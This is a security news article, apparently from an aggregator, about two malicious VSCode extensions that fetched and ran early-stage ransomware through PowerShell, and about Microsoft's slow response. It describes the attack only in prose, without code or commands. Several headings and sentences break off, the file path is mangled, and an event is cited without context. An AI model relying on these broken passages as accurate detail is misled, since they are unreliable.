Malicious VSCode Extensions Expose Critical Security Gaps in Microsoft’s Marketplace

By /

Listen to this Post

The Growing Concern Over VSCode Marketplace Security

Two malicious extensions on the VSCode Marketplace, “ahban.shiba” and “ahban.cychelloworld,” have exposed major flaws in Microsoft’s review and security processes. These extensions, designed for Visual Studio Code, were found to contain in-development ransomware, raising concerns about the platform’s ability to detect and remove malicious software in a timely manner.

Though downloaded only seven and eight times, respectively, before being removed, their presence for months on the official store is alarming. Security firm ReversingLabs uncovered that these extensions ran PowerShell commands to download and execute ransomware scripts from a remote server.

The ransomware itself appeared to be in the early stages of development, as it only encrypted files in a test folder (C:\users\%username%\Desktop estShiba). Once files were encrypted, a simple pop-up message demanded a ransom of 1 ShibaCoin but provided no further instructions, suggesting it was still a work in progress rather than a fully operational attack.

Microsoft swiftly removed the extensions after receiving reports from ReversingLabs. However, security researcher Italy Kruk from ExtensionTotal revealed that their automated scanner had detected the extensions much earlier. Microsoft was informed but took no immediate action.

Even more concerning, ahban.cychelloworld was initially benign when first uploaded on October 27, 2024, but introduced ransomware code in version 0.0.2, which was approved by Microsoft on November 24, 2024. Despite multiple updates containing malicious code, Microsoft continued to approve the extension until it was finally removed in February 2025.

This case highlights glaring weaknesses in

What Undercode Says: A Deeper Look into the Security Implications

This incident is a wake-up call for Microsoft and the entire developer community. The ability of attackers to slip malicious code into approved extensions and remain undetected for months highlights serious weaknesses in Microsoft’s security review system.

1. The Risks of Trusting Official Marketplaces

Developers and users often assume that software from official marketplaces is safe. However, as this case proves, malicious actors are actively exploiting gaps in security reviews. The presence of ransomware in a developer tool like VSCode means that even well-trusted ecosystems can become attack vectors.

2. The Evolution of Malware in Extensions

The fact that ahban.cychelloworld was initially safe but later turned malicious is particularly concerning. This means attackers can submit harmless extensions to gain trust and approvals before injecting malware in later updates. Microsoft’s failure to detect and respond quickly suggests that security measures are not proactive enough to monitor evolving threats.

3. PowerShell Exploits and Remote Execution Risks

The ransomware within these extensions executed PowerShell scripts from a remote server, a common tactic in modern cyberattacks. This highlights a broader problem: PowerShell remains a powerful attack tool that, if not properly monitored, can be used to bypass traditional security defenses. Developers should be cautious when installing extensions that have script execution capabilities.

4.

Despite being warned in November 2024, Microsoft did not act for months, allowing multiple updates of ahban.cychelloworld to introduce and retain ransomware. This raises an important question: Why did an automated scanner catch the threat before Microsoft’s security team did?

5. Inconsistencies in

Microsoft’s overreaction in removing popular VSCode themes—while failing to act on actual malware—suggests an inconsistent approach to security enforcement. Their decision-making process needs to be more transparent and based on clear, verified threats rather than assumptions.

6. The Future of VSCode Marketplace Security

To prevent similar incidents, Microsoft must:

  • Strengthen automated and manual review processes to catch malicious updates faster.
  • Implement stricter monitoring of extensions that execute remote scripts.
  • Increase transparency in how security decisions are made, ensuring developers understand why extensions are removed or approved.

Fact Checker Results

  • Microsoft failed to act on a reported malicious extension for months, despite early warnings from third-party security researchers.
  • Malicious code was added in an update, showing that extensions can evolve into threats even after initial approval.
  • Microsoft has inconsistently handled security enforcement, sometimes acting too late, and other times acting too aggressively without full verification.

References:

Reported By: https://www.bleepingcomputer.com/news/security/vscode-extensions-found-downloading-early-stage-ransomware/
Extra Source Hub:
https://www.quora.com
Wikipedia
Undercode AI

Image Source:

Pexels
Undercode AI DI v2

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Explore More: